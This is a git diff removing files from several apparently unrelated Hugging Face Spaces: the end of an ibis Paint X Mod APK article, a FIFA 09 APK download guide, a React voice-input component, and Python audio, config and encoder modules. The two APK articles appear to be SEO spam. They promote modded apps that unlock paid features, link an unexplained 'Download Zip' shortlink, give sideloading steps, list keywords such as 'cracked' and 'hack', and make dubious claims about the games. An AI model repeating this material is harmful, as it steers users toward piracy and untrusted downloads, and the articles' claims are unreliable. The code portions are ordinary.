    NameDescriptionFeatures
    MediBang PaintA lightweight digital painting and comic creation app that comes with over 1000 brushes, tones, backgrounds, textures, fonts and more.- Cloud saving and sharing - Comic creation tools - Cross-platform compatibility - Customizable shortcuts - Collaboration feature - Ads-free
    Procreate PocketA powerful sketching, painting and illustration app that offers a complete set of artistic tools for creating stunning artworks on your iPhone.- 250+ brushes - Layer system - Advanced color picker - Time-lapse recording - Animation assist - Pressure sensitivity - No ads or in-app purchases
    SketchBookA professional-grade drawing and painting app that provides a natural drawing experience with over 170 customizable brushes, rulers, guides, and more.- Layer editor - Scan sketch feature - Predictive stroke - Copic color library - Symmetry tools - Distort transform - No ads or in-app purchases
    Clip Studio PaintA versatile drawing and painting app that is ideal for creating comics, manga, illustrations, animations, and more.- 1000+ brushes - Vector layers - 3D models and materials - Frame-by-frame animation - AI colorization - Text tools - No ads or in-app purchases
    Adobe Photoshop SketchA simple and expressive drawing app that lets you create realistic sketches and paintings with various brushes, pencils, pens, markers, and more.- Layer support - Custom brushes - Adobe Creative Cloud integration - Perspective grids - Shape stencils - No ads or in-app purchases
    -

    Comparison of Alternatives to ibis Paint X Mod APK

    -

    Here is a comparison of the alternatives to ibis Paint X Mod APK based on some criteria:

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    CriteriaMediBang PaintProcreate PocketSketchBookClip Studio PaintAdobe Photoshop Sketch
    PriceFree$4.99Free$0.99/month or $9.49/yearFree
    Rating4.5/5.04.7/5.04.3/5.04.6/5.04.2/5.0
    Downloads10M+1M+10M+10M+10M+
    User reviews"Great app for beginners and professionals alike. It has a lot of features and tools that are easy to use and customize.""Best drawing app ever. It has everything you need to create amazing artworks on your phone.""Very smooth and responsive app. It has a lot of brushes and options to choose from. It also works well with a stylus.""The best app for manga and comic creation. It has a lot of features and functions that are very useful and convenient.""A simple and fun app to sketch and paint. It has a nice interface and a good selection of brushes."
    -

    Conclusion

    -

    In conclusion, ibis Paint X is a versatile drawing app that provides a smooth and comfortable drawing experience with over 15000 brushes, over 15000 materials, over 1000 fonts, 80 filters, 46 screentones, 27 blending modes, and various ruler and clipping mask features. It is an app that allows you to create stunning digital art and comics on your Android device. You can also share your drawing process as a video and learn from other users' drawing techniques on the community site "ibispaint.com".

    -

    If you want to enjoy all the premium features of ibis Paint X for free, you can download ibis Paint X Mod APK. It is a modified version of ibis Paint X that allows you to access all the prime materials, fonts, filters, and more without paying anything. You can also remove the watermark from your videos and export them in high resolution. With ibis Paint X Mod APK, you can have unlimited fun and creativity with drawing.

    -

    If you are looking for some alternatives to ibis Paint X Mod APK, you can try MediBang Paint, Procreate Pocket, SketchBook, Clip Studio Paint, or Adobe Photoshop Sketch. They are all great drawing and painting apps that offer different features and tools for creating amazing artworks on your device.

    -

    We hope this article has helped you to learn more about ibis Paint X, ibis Paint X Mod APK, and some alternatives to it. If you have any questions or feedback, please feel free to leave a comment below. Happy drawing!

    -

    FAQs

    -

    Here are some frequently asked questions about ibis Paint X and ibis Paint X Mod APK:

    -

    Is ibis Paint X safe to use?

    -

    Yes, ibis Paint X is safe to use. It is a legitimate app that is developed by ibis mobile inc., a Japanese company that specializes in developing apps for digital art and comics. It is also available on the Google Play Store and the App Store. However, you should be careful when downloading ibis Paint X Mod APK from third-party sources, as they may contain viruses or malware that can harm your device.

    -

    Is ibis Paint X free to use?

    -

    Yes, ibis Paint X is free to use. You can download and use the app without paying anything. However, if you want to access the prime materials, fonts, filters, and more, you need to watch ads or pay for the prime membership. Alternatively, you can download ibis Paint X Mod APK and enjoy all the premium features for free.

    -

    How do I update ibis Paint X Mod APK?

    -

    If you want to update ibis Paint X Mod APK, you need to download the latest version of the APK file from a trusted source and install it on your device. You may need to uninstall the previous version of the app before installing the new one. You should also backup your data before updating the app.

    -

    Can I use ibis Paint X on PC?

    -

    No, ibis Paint X is not available for PC. It is only compatible with Android and iOS devices. However, you can use an Android emulator such as BlueStacks or Nox Player to run ibis Paint X on your PC. You can also use a drawing tablet or a stylus to draw on your PC with ibis Paint X.

    -

    Can I use ibis Paint X offline?

    -

    Yes, you can use ibis Paint X offline. You don't need an internet connection to draw or save your artworks on your device. However, you need an internet connection to access the prime materials and fonts, share your videos or artworks on social media or the community site "ibispaint.com", or update the app.

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/FIFA 09 APK for Android - The Ultimate Guide to Download and Install.md b/spaces/1phancelerku/anime-remove-background/FIFA 09 APK for Android - The Ultimate Guide to Download and Install.md deleted file mode 100644 index 88ea3762750426a9fa37acc28f683dae17f0ec31..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/FIFA 09 APK for Android - The Ultimate Guide to Download and Install.md +++ /dev/null @@ -1,98 +0,0 @@ - -

    How to Download FIFA 09 APK for Android

    -

    If you are looking for a fun and realistic football game to play on your Android device, you should try FIFA 09. This is one of the best games in the FIFA series, developed by EA Sports. It has amazing graphics, smooth controls, and diverse content that will keep you entertained for hours. In this article, we will tell you what FIFA 09 is, what are its features and benefits, and how to download FIFA 09 APK for Android.

    -

    What is FIFA 09 and why you should play itWhat is FIFA 09 and why you should play it

    -

    FIFA 09 is a football simulation game developed by EA Sports. It was released in October 2008 for various platforms, including PC, consoles, and mobile devices. It has over 250 gameplay improvements and enhancements that make it more realistic and responsive. It has a variety of game modes, such as Be a Pro, Manager Mode, Ultimate Team, and Online Multiplayer.

    -

    download fifa 09 apk for android


    Download Zip ✺✺✺ https://jinyurl.com/2uNSJh



    -

    FIFA 09 is a football simulation game developed by EA Sports

    -

    EA Sports is a division of Electronic Arts that specializes in sports video games. It is one of the most popular and successful game developers in the industry. EA Sports has produced many acclaimed titles, such as Madden NFL, NBA Live, NHL, and FIFA. FIFA is the flagship franchise of EA Sports, and it has been running since 1993. FIFA 09 is the 16th installment in the series, and it is considered one of the best by critics and fans alike.

    -

    FIFA 09 is a fun and exciting game for football fans and gamers alike

    -

    If you love football, you will love FIFA 09. This game lets you play as your favorite teams and players from around the world. You can choose from over 500 licensed teams and more than 30 leagues, including the Premier League, La Liga, Bundesliga, Serie A, and more. You can also create your own custom teams and players with the Ultimate Team mode. This mode allows you to collect cards of players, kits, stadiums, and other items, and use them to build your dream team.

    -

    But playing FIFA 09 is not just about choosing teams and players. It is also about competing with other players online in 10 vs. 10 matches or tournaments. You can join or create your own club with your friends or other players, and play against other clubs from around the world. You can also chat with your teammates and opponents using the voice or text chat feature. Playing online is a great way to test your skills and have fun with other football enthusiasts.

    What are the features and benefits of FIFA 09

    -

    FIFA 09 is not just a game, it is an experience. It has stunning graphics and animations that bring the game to life. It has smooth and intuitive controls that make it easy to play. It has a rich and diverse content that keeps you entertained for hours. Here are some of the features and benefits of FIFA 09 that you should know.

    -

    FIFA 09 has stunning graphics and animations that bring the game to life

    -

    One of the things that make FIFA 09 stand out is its visual quality. It uses leading-edge visuals that exploit the power of high-spec gaming devices. It features photorealistic likenesses of star players and stadiums. It has a revamped collision system that calculates speed, weight, and power when players collide. It has subtle animations that enable you to take first-time shots, volleys, and headers. It also has a dynamic weather system that affects the gameplay and atmosphere. You will feel like you are watching a real match on TV or playing on the pitch yourself.

    -

    FIFA 09 has smooth and intuitive controls that make it easy to play

    -

    Another thing that makes FIFA 09 enjoyable is its control scheme. It has a customizable control scheme that suits your preferences and device. You can choose from different options, such as buttons, gestures, or tilt. You can also adjust the sensitivity and responsiveness of the controls. You can also use a new jostle system that allows you to control the ball with more precision and skill. You can use the right analog stick to shield the ball, push off defenders, or perform tricks. You can also use the left trigger to sprint, the right trigger to slow down, or the shoulder buttons to switch players or tactics.

    -

    FIFA 09 has a rich and diverse content that keeps you entertained for hours

    -

    The last thing that makes FIFA 09 amazing is its content. It has over 500 licensed teams and more than 30 leagues from around the world. You can play as any team or player you want, from Manchester United to Barcelona, from Cristiano Ronaldo to Lionel Messi. You can also play in different game modes, such as Be a Pro, Manager Mode, Ultimate Team, and Online Multiplayer. Each mode has its own challenges and rewards. You can also play in different minigames and challenges that test your skills and knowledge. You can play in penalty shootouts, free kicks, dribbling courses, trivia quizzes, and more.

    How to download FIFA 09 APK for Android

    -

    Now that you know what FIFA 09 is and what it offers, you might be wondering how to download it on your Android device. Well, you can't find it on the Google Play Store, because it is an old game that is not compatible with the latest Android versions. But don't worry, there is a way to play it on your device. You just need to download FIFA 09 APK for Android.

    -

    How to download fifa 09 apk for android free
    -Download fifa 09 apk for android offline mode
    -Download fifa 09 apk for android with obb file
    -Download fifa 09 apk for android full version
    -Download fifa 09 apk for android modded
    -Download fifa 09 apk for android no verification
    -Download fifa 09 apk for android latest update
    -Download fifa 09 apk for android highly compressed
    -Download fifa 09 apk for android unlimited coins
    -Download fifa 09 apk for android from google play
    -Best site to download fifa 09 apk for android
    -Download fifa 09 apk for android without root
    -Download fifa 09 apk for android on pc
    -Download fifa 09 apk for android emulator
    -Download fifa 09 apk for android cracked
    -Download fifa 09 apk for android hack
    -Download fifa 09 apk for android cheats
    -Download fifa 09 apk for android gameplay
    -Download fifa 09 apk for android review
    -Download fifa 09 apk for android tips and tricks
    -Download fifa 09 apk for android requirements
    -Download fifa 09 apk for android size
    -Download fifa 09 apk for android features
    -Download fifa 09 apk for android graphics
    -Download fifa 09 apk for android soundtracks
    -Download fifa 09 apk for android teams and players
    -Download fifa 09 apk for android modes and tournaments
    -Download fifa 09 apk for android controls and settings
    -Download fifa 09 apk for android bugs and fixes
    -Download fifa 09 apk for android comparison with other versions
    -Benefits of downloading fifa 09 apk for android
    -Risks of downloading fifa 09 apk for android
    -Alternatives to download fifa 09 apk for android
    -How to install and run fifa 09 apk for android
    -How to update and uninstall fifa 09 apk for android
    -How to backup and restore fifa 09 apk for android data
    -How to transfer and share fifa 09 apk for android files
    -How to customize and optimize fifa 09 apk for android performance
    -How to troubleshoot and solve fifa 09 apk for android problems
    -How to contact and get support for fifa 09 apk for android issues

    -

    FIFA 09 APK is a file that allows you to install the game on your Android device without using the Google Play Store

    -

    APK stands for Android Package Kit, and it is a file format that contains all the necessary components of an Android app. It is useful if you have a device that is not compatible with the official version or if you want to save storage space. It is also useful if you want to play the game offline or with mods and cheats.

    -

    To download FIFA 09 APK for Android, you need to follow these steps:

    -

    Downloading FIFA 09 APK for Android is not difficult, but you need to be careful and follow some precautions. Here are the steps you need to take:

    -
      -
    1. Find a reliable source that offers the APK file for free. You can use one of these links: . Make sure you scan the file for viruses and malware before downloading it.
    2. -
    3. Download the APK file to your device or transfer it from your PC using a USB cable or Bluetooth connection.
    4. -
    5. Enable the installation of apps from unknown sources on your device. You can do this by going to Settings > Security > Unknown Sources and toggling it on.
    6. -
    7. Locate the APK file on your device using a file manager app or your browser's downloads folder. Tap on it to start the installation process.
    8. -
    9. Follow the instructions on the screen to complete the installation. You may need to grant some permissions or accept some terms and conditions.
    10. -
    11. Launch the game from your app drawer or home screen and enjoy playing FIFA 09 on your Android device.
    12. -
    -

    Conclusion

    -

    FIFA 09 is one of the best football games ever made, and you can play it on your Android device with FIFA 09 APK. It has amazing graphics, smooth controls, and diverse content that will keep you entertained for hours. You can play as your favorite teams and players, create your own custom teams and players, compete with other players online, and more. You just need to follow some simple steps to download and install the game on your device.

    -

    Here are some tips or recommendations for playing FIFA 09 on Android:

    -
      -
    • Make sure you have enough storage space and battery life on your device before playing the game.
    • -
    • Adjust the graphics settings and sound options according to your device's performance and preferences.
    • -
    • Use a Wi-Fi connection or a data plan with enough bandwidth when playing online.
    • -
    • Keep your device updated with the latest software and security patches.
    • -
    • Have fun and enjoy the game!
    • -
    -

    We hope you found this article helpful and informative. If you have any feedback or questions, please feel free to leave them in the comments section below. We would love to hear from you!

    -

    Frequently Asked Questions

    -

    Here are some of the most common questions that people ask about FIFA 09 APK for Android:

    -

    Q: Is FIFA 09 APK for Android safe to download and install?

    -

    A: Yes, as long as you download it from a reliable source and scan it for viruses and malware before installing it. However, we cannot guarantee that it will work perfectly on every device or that it will not cause any issues or damage to your device. Use it at your own risk and discretion.

    -

    Q: Is FIFA 09 APK for Android legal to use?

    -

    A: That depends on where you live and what laws apply there. In some countries, downloading and using APK files from unknown sources may be considered illegal or infringing on intellectual property rights. In other countries, it may be legal or tolerated as long as you own a copy of the original game or app. We advise you to check your local laws and regulations before downloading and using FIFA 09 APK for Android.

    -

    Q: Is FIFA 09 APK for Android compatible with my device?

    -

    A: FIFA 09 APK for Android is designed to work on most Android devices that run on Android 4.0 or higher. However, some devices may not be compatible due to hardware limitations, software conflicts, or other reasons. If you encounter any problems or errors

    when playing the game, you may try to uninstall and reinstall the game, clear the cache and data, or contact the developer for support.

    -

    Q: How can I update FIFA 09 APK for Android?

    -

    A: FIFA 09 APK for Android is not an official version of the game, so it does not receive regular updates from EA Sports. However, some sources may offer updated versions of the APK file with new features or bug fixes. You can check the source where you downloaded the APK file for any updates or look for other sources that offer newer versions. To update the game, you need to download and install the new APK file over the old one.

    -

    Q: Can I play FIFA 09 APK for Android with a controller or a keyboard?

    -

    A: Yes, you can play FIFA 09 APK for Android with a controller or a keyboard if your device supports them. You can connect your controller or keyboard to your device via Bluetooth, USB, or OTG cable. You can also use an app like Octopus or Panda Gamepad Pro to map the buttons and keys to the game controls. However, some controllers or keyboards may not work well with the game or may cause some issues or errors.

    -

    -

    This is the end of the article. Thank you for reading and I hope you learned something new and useful. If you have any questions or comments, please leave them below and I will try to answer them as soon as possible. Have a great day!

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/2023Liu2023/bingo/src/components/voice.tsx b/spaces/2023Liu2023/bingo/src/components/voice.tsx deleted file mode 100644 index 074d0e145229947282a472bd84f6578cf0b3c71c..0000000000000000000000000000000000000000 --- a/spaces/2023Liu2023/bingo/src/components/voice.tsx +++ /dev/null @@ -1,52 +0,0 @@ -import React, { useEffect } from 'react' -import { useSetAtom } from 'jotai' -import { useBing } from '@/lib/hooks/use-bing' -import Image from 'next/image' -import VoiceIcon from '@/assets/images/voice.svg' -import VoiceButton from './ui/voice' -import { SR } from '@/lib/bots/bing/sr' -import { voiceListenAtom } from '@/state' - -const sr = new SR(['发送', '清空', '退出']) - -const Voice = ({ setInput, input, sendMessage, isSpeaking }: Pick, 'setInput' | 'sendMessage' | 'input' | 'isSpeaking'>) => { - const setListen = useSetAtom(voiceListenAtom) - useEffect(() => { - if (sr.listening) return - sr.transcript = !isSpeaking - }, [isSpeaking]) - - useEffect(() => { - sr.onchange = (msg: string, command?: string) => { - switch (command) { - case '退出': - sr.stop() - break; - case '发送': - sendMessage(input) - case '清空': - setInput('') - break; - default: - setInput(input + msg) - } - } - }, [input]) - - const switchSR = (enable: boolean = false) => { - setListen(enable) - if (enable) { - sr.start() - } else { - sr.stop() - } - } - - return sr.listening ? ( - switchSR(false)} /> - ) : ( - start voice switchSR(true)} /> - ) -}; - -export default Voice; diff --git a/spaces/801artistry/RVC801/infer/lib/audio.py b/spaces/801artistry/RVC801/infer/lib/audio.py deleted file mode 100644 index 9ad4ff74218957cf18782fa71add40a734b47e78..0000000000000000000000000000000000000000 --- a/spaces/801artistry/RVC801/infer/lib/audio.py +++ /dev/null @@ -1,197 +0,0 @@ -import librosa -import numpy as np -import av -from io import BytesIO -import ffmpeg -import os -import sys - -import random -from infer.lib.csvutil import CSVutil -#import csv - -platform_stft_mapping = { - 'linux': 'stftpitchshift', - 'darwin': 'stftpitchshift', - 'win32': 'stftpitchshift.exe', -} - -stft = platform_stft_mapping.get(sys.platform) - -def wav2(i, o, format): - inp = av.open(i, 'rb') - if format == "m4a": format = "mp4" - out = av.open(o, 'wb', format=format) - if format == "ogg": format = "libvorbis" - if format == "mp4": format = "aac" - - ostream = out.add_stream(format) - - for frame in inp.decode(audio=0): - for p in ostream.encode(frame): out.mux(p) - - for p in ostream.encode(None): out.mux(p) - - out.close() - inp.close() - -def audio2(i, o, format, sr): - inp = av.open(i, 'rb') - out = av.open(o, 'wb', format=format) - if format == "ogg": format = "libvorbis" - if format == "f32le": format = "pcm_f32le" - - ostream = out.add_stream(format, channels=1) - ostream.sample_rate = sr - - for frame in inp.decode(audio=0): - for p in ostream.encode(frame): out.mux(p) - - out.close() - inp.close() - -def load_audion(file, sr): - try: - file = ( - file.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - ) # 防止小白拷路径头尾带了空格和"和回车 - with open(file, "rb") as f: - with BytesIO() as out: - audio2(f, out, "f32le", sr) - return np.frombuffer(out.getvalue(), np.float32).flatten() - - except AttributeError: - audio = file[1] / 32768.0 - if len(audio.shape) == 2: - audio = np.mean(audio, -1) - return librosa.resample(audio, orig_sr=file[0], target_sr=16000) - - except Exception as e: - raise RuntimeError(f"Failed to load audio: {e}") - - - - -def load_audio(file, sr, DoFormant=False, Quefrency=1.0, Timbre=1.0): - converted = False - DoFormant, Quefrency, Timbre = CSVutil("csvdb/formanting.csv", "r", "formanting") - try: - # https://github.com/openai/whisper/blob/main/whisper/audio.py#L26 - # This launches a subprocess to decode audio while down-mixing and resampling as necessary. - # Requires the ffmpeg CLI and `ffmpeg-python` package to be installed. - file = ( - file.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - ) # 防止小白拷路径头尾带了空格和"和回车 - file_formanted = file.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - - # print(f"dofor={bool(DoFormant)} timbr={Timbre} quef={Quefrency}\n") - - if ( - lambda DoFormant: True - if DoFormant.lower() == "true" - else (False if DoFormant.lower() == "false" else DoFormant) - )(DoFormant): - numerator = round(random.uniform(1, 4), 4) - # os.system(f"stftpitchshift -i {file} -q {Quefrency} -t {Timbre} -o {file_formanted}") - # print('stftpitchshift -i "%s" -p 1.0 --rms -w 128 -v 8 -q %s -t %s -o "%s"' % (file, Quefrency, Timbre, file_formanted)) - - if not file.endswith(".wav"): - if not os.path.isfile(f"{file_formanted}.wav"): - converted = True - # print(f"\nfile = {file}\n") - # print(f"\nfile_formanted = {file_formanted}\n") - converting = ( - ffmpeg.input(file_formanted, threads=0) - .output(f"{file_formanted}.wav") - .run( - cmd=["ffmpeg", "-nostdin"], - capture_stdout=True, - capture_stderr=True, - ) - ) - else: - pass - - file_formanted = ( - f"{file_formanted}.wav" - if not file_formanted.endswith(".wav") - else file_formanted - ) - - print(f" · Formanting {file_formanted}...\n") - - os.system( - '%s -i "%s" -q "%s" -t "%s" -o "%sFORMANTED_%s.wav"' - % ( - stft, - file_formanted, - Quefrency, - Timbre, - file_formanted, - str(numerator), - ) - ) - - print(f" · Formanted {file_formanted}!\n") - - # filepraat = (os.path.abspath(os.getcwd()) + '\\' + file).replace('/','\\') - # file_formantedpraat = ('"' + os.path.abspath(os.getcwd()) + '/' + 'formanted'.join(file_formanted) + '"').replace('/','\\') - # print("%sFORMANTED_%s.wav" % (file_formanted, str(numerator))) - - out, _ = ( - ffmpeg.input( - "%sFORMANTED_%s.wav" % (file_formanted, str(numerator)), threads=0 - ) - .output("-", format="f32le", acodec="pcm_f32le", ac=1, ar=sr) - .run( - cmd=["ffmpeg", "-nostdin"], capture_stdout=True, capture_stderr=True - ) - ) - - try: - os.remove("%sFORMANTED_%s.wav" % (file_formanted, str(numerator))) - except Exception: - pass - print("couldn't remove formanted type of file") - - else: - out, _ = ( - ffmpeg.input(file, threads=0) - .output("-", format="f32le", acodec="pcm_f32le", ac=1, ar=sr) - .run( - cmd=["ffmpeg", "-nostdin"], capture_stdout=True, capture_stderr=True - ) - ) - except Exception as e: - raise RuntimeError(f"Failed to load audio: {e}") - - if converted: - try: - os.remove(file_formanted) - except Exception: - pass - print("couldn't remove converted type of file") - converted = False - - return np.frombuffer(out, np.float32).flatten() - - -def check_audio_duration(file): - try: - file = file.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - - probe = ffmpeg.probe(file) - - duration = float(probe['streams'][0]['duration']) - - if duration < 0.76: - print( - f"\n------------\n" - f"Audio file, {file.split('/')[-1]}, under ~0.76s detected - file is too short. Target at least 1-2s for best results." - f"\n------------\n\n" - ) - return False - - return True - except Exception as e: - raise RuntimeError(f"Failed to check audio duration: {e}") \ No newline at end of file diff --git a/spaces/A666sxr/Genshin_TTS/monotonic_align/__init__.py b/spaces/A666sxr/Genshin_TTS/monotonic_align/__init__.py deleted file mode 100644 index 3d7009c40fea3a98168e3e3bc9ae061e91327422..0000000000000000000000000000000000000000 --- a/spaces/A666sxr/Genshin_TTS/monotonic_align/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -import numpy as np -import torch -from .monotonic_align.core import maximum_path_c - - -def maximum_path(neg_cent, mask): - """ Cython optimized version. - neg_cent: [b, t_t, t_s] - mask: [b, t_t, t_s] - """ - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(np.float32) - path = np.zeros(neg_cent.shape, dtype=np.int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(np.int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(np.int32) - maximum_path_c(path, neg_cent, t_t_max, t_s_max) - return torch.from_numpy(path).to(device=device, dtype=dtype) diff --git a/spaces/AIGC-Audio/AudioGPT/NeuralSeq/utils/hparams.py b/spaces/AIGC-Audio/AudioGPT/NeuralSeq/utils/hparams.py deleted file mode 100644 index c76c5cfc896308d9a84c6254a7ca00b8235e7516..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/AudioGPT/NeuralSeq/utils/hparams.py +++ /dev/null @@ -1,129 +0,0 @@ -import argparse -import os -import yaml - -global_print_hparams = True -hparams = {} - - -class Args: - def __init__(self, **kwargs): - for k, v in kwargs.items(): - self.__setattr__(k, v) - - -def override_config(old_config: dict, new_config: dict): - for k, v in new_config.items(): - if isinstance(v, dict) and k in old_config: - override_config(old_config[k], new_config[k]) - else: - old_config[k] = v - - -def set_hparams(config='', exp_name='', hparams_str='', print_hparams=True, global_hparams=True): - if config == '' and exp_name == '': - parser = argparse.ArgumentParser(description='') - parser.add_argument('--config', type=str, default='', - help='location of the data corpus') - parser.add_argument('--exp_name', type=str, default='', help='exp_name') - parser.add_argument('-hp', '--hparams', type=str, default='', - help='location of the data corpus') - parser.add_argument('--infer', action='store_true', help='infer') - parser.add_argument('--validate', action='store_true', help='validate') - parser.add_argument('--reset', action='store_true', help='reset hparams') - parser.add_argument('--remove', action='store_true', help='remove old ckpt') - parser.add_argument('--debug', action='store_true', help='debug') - args, unknown = parser.parse_known_args() - print("| Unknow hparams: ", unknown) - else: - args = Args(config=config, exp_name=exp_name, hparams=hparams_str, - infer=False, validate=False, reset=False, debug=False, remove=False) - global hparams - assert args.config != '' or args.exp_name != '' - if args.config != '': - assert os.path.exists(args.config) - - config_chains = [] - loaded_config = set() - - def load_config(config_fn): - # deep first inheritance and avoid the second visit of one node - if not os.path.exists(config_fn): - return {} - with open(config_fn) as f: - hparams_ = yaml.safe_load(f) - loaded_config.add(config_fn) - if 'base_config' in hparams_: - ret_hparams = {} - if not isinstance(hparams_['base_config'], list): - hparams_['base_config'] = [hparams_['base_config']] - for c in hparams_['base_config']: - if c.startswith('.'): - c = f'{os.path.dirname(config_fn)}/{c}' - c = os.path.normpath(c) - if c not in loaded_config: - override_config(ret_hparams, load_config(c)) - override_config(ret_hparams, hparams_) - else: - ret_hparams = hparams_ - config_chains.append(config_fn) - return ret_hparams - - saved_hparams = {} - args_work_dir = '' - if args.exp_name != '': - args_work_dir = f'{args.exp_name}' # modified - ckpt_config_path = f'{args_work_dir}/config.yaml' - if os.path.exists(ckpt_config_path): - with open(ckpt_config_path) as f: - saved_hparams_ = yaml.safe_load(f) - if saved_hparams_ is not None: - saved_hparams.update(saved_hparams_) - hparams_ = {} - if args.config != '': - hparams_.update(load_config(args.config)) - if not args.reset: - hparams_.update(saved_hparams) - hparams_['work_dir'] = args_work_dir - - # Support config overriding in command line. Support list type config overriding. - # Examples: --hparams="a=1,b.c=2,d=[1 1 1]" - if args.hparams != "": - for new_hparam in args.hparams.split(","): - k, v = new_hparam.split("=") - v = v.strip("\'\" ") - config_node = hparams_ - for k_ in k.split(".")[:-1]: - config_node = config_node[k_] - k = k.split(".")[-1] - if v in ['True', 'False'] or type(config_node[k]) in [bool, list, dict]: - if type(config_node[k]) == list: - v = v.replace(" ", ",") - config_node[k] = eval(v) - else: - config_node[k] = type(config_node[k])(v) - if args_work_dir != '' and args.remove: - answer = input("REMOVE old checkpoint? Y/N [Default: N]: ") - if answer.lower() == "y": - remove_file(args_work_dir) - if args_work_dir != '' and (not os.path.exists(ckpt_config_path) or args.reset) and not args.infer: - os.makedirs(hparams_['work_dir'], exist_ok=True) - with open(ckpt_config_path, 'w') as f: - yaml.safe_dump(hparams_, f) - - hparams_['infer'] = args.infer - hparams_['debug'] = args.debug - hparams_['validate'] = args.validate - hparams_['exp_name'] = args.exp_name - global global_print_hparams - if global_hparams: - hparams.clear() - hparams.update(hparams_) - if print_hparams and global_print_hparams and global_hparams: - print('| Hparams chains: ', config_chains) - print('| Hparams: ') - for i, (k, v) in enumerate(sorted(hparams_.items())): - print(f"\033[;33;m{k}\033[0m: {v}, ", end="\n" if i % 5 == 4 else "") - print("") - global_print_hparams = False - return hparams_ \ No newline at end of file diff --git a/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/models/encoder.py b/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/models/encoder.py deleted file mode 100644 index 0d6d8e87e0ed07abc04f6e79b0fa08cd102398a0..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/models/encoder.py +++ /dev/null @@ -1,686 +0,0 @@ -# -*- coding: utf-8 -*- - -import math -import copy - -import torch -import torch.nn as nn -import torch.nn.functional as F -from torchaudio import transforms -from torchlibrosa.augmentation import SpecAugmentation - -from .utils import mean_with_lens, max_with_lens, \ - init, pack_wrapper, generate_length_mask, PositionalEncoding - - -def init_layer(layer): - """Initialize a Linear or Convolutional layer. """ - nn.init.xavier_uniform_(layer.weight) - - if hasattr(layer, 'bias'): - if layer.bias is not None: - layer.bias.data.fill_(0.) - - -def init_bn(bn): - """Initialize a Batchnorm layer. """ - bn.bias.data.fill_(0.) - bn.weight.data.fill_(1.) - - -class BaseEncoder(nn.Module): - - """ - Encode the given audio into embedding - Base encoder class, cannot be called directly - All encoders should inherit from this class - """ - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim): - super(BaseEncoder, self).__init__() - self.spec_dim = spec_dim - self.fc_feat_dim = fc_feat_dim - self.attn_feat_dim = attn_feat_dim - - - def forward(self, x): - ######################### - # an encoder first encodes audio feature into embedding, obtaining - # `encoded`: { - # fc_embs: [N, fc_emb_dim], - # attn_embs: [N, attn_max_len, attn_emb_dim], - # attn_emb_lens: [N,] - # } - ######################### - raise NotImplementedError - - -class Block2D(nn.Module): - - def __init__(self, cin, cout, kernel_size=3, padding=1): - super().__init__() - self.block = nn.Sequential( - nn.BatchNorm2d(cin), - nn.Conv2d(cin, - cout, - kernel_size=kernel_size, - padding=padding, - bias=False), - nn.LeakyReLU(inplace=True, negative_slope=0.1)) - - def forward(self, x): - return self.block(x) - - -class LinearSoftPool(nn.Module): - """LinearSoftPool - Linear softmax, takes logits and returns a probability, near to the actual maximum value. - Taken from the paper: - A Comparison of Five Multiple Instance Learning Pooling Functions for Sound Event Detection with Weak Labeling - https://arxiv.org/abs/1810.09050 - """ - def __init__(self, pooldim=1): - super().__init__() - self.pooldim = pooldim - - def forward(self, logits, time_decision): - return (time_decision**2).sum(self.pooldim) / time_decision.sum( - self.pooldim) - - -class MeanPool(nn.Module): - - def __init__(self, pooldim=1): - super().__init__() - self.pooldim = pooldim - - def forward(self, logits, decision): - return torch.mean(decision, dim=self.pooldim) - - -class AttentionPool(nn.Module): - """docstring for AttentionPool""" - def __init__(self, inputdim, outputdim=10, pooldim=1, **kwargs): - super().__init__() - self.inputdim = inputdim - self.outputdim = outputdim - self.pooldim = pooldim - self.transform = nn.Linear(inputdim, outputdim) - self.activ = nn.Softmax(dim=self.pooldim) - self.eps = 1e-7 - - def forward(self, logits, decision): - # Input is (B, T, D) - # B, T, D - w = self.activ(torch.clamp(self.transform(logits), -15, 15)) - detect = (decision * w).sum( - self.pooldim) / (w.sum(self.pooldim) + self.eps) - # B, T, D - return detect - - -class MMPool(nn.Module): - - def __init__(self, dims): - super().__init__() - self.avgpool = nn.AvgPool2d(dims) - self.maxpool = nn.MaxPool2d(dims) - - def forward(self, x): - return self.avgpool(x) + self.maxpool(x) - - -def parse_poolingfunction(poolingfunction_name='mean', **kwargs): - """parse_poolingfunction - A heler function to parse any temporal pooling - Pooling is done on dimension 1 - :param poolingfunction_name: - :param **kwargs: - """ - poolingfunction_name = poolingfunction_name.lower() - if poolingfunction_name == 'mean': - return MeanPool(pooldim=1) - elif poolingfunction_name == 'linear': - return LinearSoftPool(pooldim=1) - elif poolingfunction_name == 'attention': - return AttentionPool(inputdim=kwargs['inputdim'], - outputdim=kwargs['outputdim']) - - -def embedding_pooling(x, lens, pooling="mean"): - if pooling == "max": - fc_embs = max_with_lens(x, lens) - elif pooling == "mean": - fc_embs = mean_with_lens(x, lens) - elif pooling == "mean+max": - x_mean = mean_with_lens(x, lens) - x_max = max_with_lens(x, lens) - fc_embs = x_mean + x_max - elif pooling == "last": - indices = (lens - 1).reshape(-1, 1, 1).repeat(1, 1, x.size(-1)) - # indices: [N, 1, hidden] - fc_embs = torch.gather(x, 1, indices).squeeze(1) - else: - raise Exception(f"pooling method {pooling} not support") - return fc_embs - - -class Cdur5Encoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim, pooling="mean"): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.pooling = pooling - self.features = nn.Sequential( - Block2D(1, 32), - nn.LPPool2d(4, 